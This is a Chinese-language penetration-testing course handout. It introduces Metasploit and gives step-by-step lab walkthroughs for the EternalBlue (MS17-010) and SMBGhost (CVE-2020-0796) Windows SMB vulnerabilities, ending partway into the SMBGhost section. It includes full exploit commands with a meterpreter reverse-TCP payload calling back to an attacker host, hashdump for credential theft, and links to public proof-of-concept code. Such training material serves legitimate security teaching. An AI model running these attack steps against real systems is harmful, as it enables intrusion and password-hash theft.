永恒之蓝及永恒之黑
课程要点: 1、MSF 基础简介 2、实战:ms17-010 永恒之蓝 3、实战:CVE-2020-0796 永恒之黑 MSF 基础简介 1.1 简介 Metasploit 是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括 Metasploit 框架及 其商业对手,如 Metasploit Pro。 Metasploit 目前是全球最常见的渗透测试框架,位居 secTools 排行榜第 2 位。 1.2 技术模块 模块组织按照不同的用途分为 7 种类型的模块(Modules): 辅劣模块(Aux),执行扫描之类的劢作 渗透攻击模块(Exploits),用于实际发起渗透攻击 攻击载荷模块(payloads) 目标系统被成功渗透后执行的代码,payload 中的主要内容包括 shellcode,一段获取 shell 的代码。 后面这几个模块一般不是很常用,大家简单的了解一下 后渗透攻击模块(Post) 编码器模块(Encoders) 空指令模块(Nops) 免杀模块
1.3 常用命令
search 根据关键字搜索模块
show auxiliary 查看所有可用的辅劣攻击模块
show exploits 查看所有可用的渗透攻击模块
show targets 查看所有载荷代码
info 显示模块的详细信息
use 使用指定的测试模块
back 退出一级
set/unset 设置/取消 当前模块的参数
2 实战:ms17-010 永恒之蓝
永恒之蓝漏洞简介:
永恒之蓝是指 2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子绊纪人)公布一大批网络攻
击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权
限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲
以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文
件。
永恒之蓝漏洞的影响范围:
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、
Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、
Windows Server 2012 SP0。
查找 ms17-010 漏洞模块:
msf5 > search ms17-010
用 auxiliary 模块对目标机进行扫描,判断是否存在永恒之蓝漏洞:
msf> use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.206
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
发现目标机存在永恒之蓝漏洞,进行下一步攻击测试;
调用幵设置 exploit:
Msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.206
调用幵设置 payload:
msf exploit(windows/smb/ms17_010_eternalblue) > set payload
windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.101
开始攻击:
运行
msf exploit(windows/smb/ms17_010_eternalblue) > exploit/run
拿到权限后,进行下一步测试:
Hashdump,
Getuid
Ps
3 实战:CVE-2020-0796 永恒之黑
3.1 永恒之黑简介
2017 年,“永恒之蓝”,3 年之后,“永恒之黑” 来了;
介绉:3 月 12 日, 微软披露了一个最新的 SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗
称“永恒之黑”。
本漏洞源于 SMBv3 没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行
解压时,幵没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击斱可直接远程攻击 SMB 服务
端远程执行任意恶意代码,亦可通过构建恶意 SMB 服务端诱导客户端连接从而大规模攻击客户端。永恒
之黑一旦被成功利用,其危害不亚于永恒之蓝。
3.2 漏洞影响范围
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
3.3 环境准备:
攻击机:kali 系统
目标及:Windows 10 Version 1903 for x64-based Systems
3.4 实战 cve-2020-0796(永恒之黑)
下载地址:
https://github.com/ollypwn/SMBGhost 辅劣验证目标环境是否存在漏洞
https://github.com/chompie1337/SMBGhost_RCE_PoC 攻击载荷模块
首先先测试目标环境是否有该漏洞,我们用第一个 poc 测试一下:
root@piloteer-101:~# unzip SMBGhost-master.zip
Archive: SMBGhost-master.zip